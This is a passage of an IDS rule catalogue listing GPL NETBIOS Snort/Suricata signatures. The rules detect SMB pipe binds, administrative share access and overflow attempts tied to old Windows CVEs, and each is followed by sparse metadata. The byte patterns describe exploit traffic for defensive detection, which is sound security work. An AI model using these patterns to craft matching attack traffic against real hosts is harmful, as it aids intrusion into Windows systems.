Performance Impact : Not defined

2102960

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102960; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102956

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102956; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102961

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102961; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102957

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102957; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102988

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102988; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102984

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|winreg|00|"; within:8; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102984; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102989

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102989; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102985

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102985; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102982

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102982; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102983

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102983; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102978

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2102978; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102979

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102979; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102974

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102974; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102975

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102975; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102496

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCEPRC ORPCThis request flood attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|05|"; within:1; distance:21; content:"MEOW"; flowbits:isset,dce.isystemactivator.bind.call.attempt; threshold:type both, track by_dst, count 20, seconds 60; reference:bugtraq,8811; reference:cve,2003-0813; reference:nessus,12206; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:misc-attack; sid:2102496; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCEPRC ORPCThis request flood attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,8811|cve,2003-0813|nessus,12206|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102491

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC ISystemActivator unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.call.attempt; reference:bugtraq,8811; reference:cve,2003-0813; reference:nessus,12206; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102491; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8811|cve,2003-0813|nessus,12206|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102385

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt"; flow:to_server,established; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"`"; depth:1; offset:63; content:"|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|"; within:15; distance:1; content:"|06 0A|+|06 01 04 01 82|7|02 02 0A|"; distance:0; content:"|A3|>0<|A0|0"; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102385; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12054|nessus,12065

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102954

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102954; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102955

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102955; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102968

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102968; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102969

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102969; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102970

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102970; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102971

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102971; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102402

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup AndX request username overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; byte_test:2,>,322,2; content:"|FF|SMBs"; depth:5; offset:4; nocase; byte_test:1,<,128,6,relative; content:"|00 00 00 00|"; within:4; distance:42; byte_test:2,>,255,8,relative,little; content:!"|00|"; within:255; distance:10; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:attempted-admin; sid:2102402; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup AndX request username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102962

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102962; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102958

